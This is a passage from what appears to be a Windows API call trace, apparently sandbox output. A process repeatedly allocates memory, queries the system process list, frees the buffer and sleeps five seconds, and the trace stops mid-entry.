returned 0x0 [0276.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.047] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 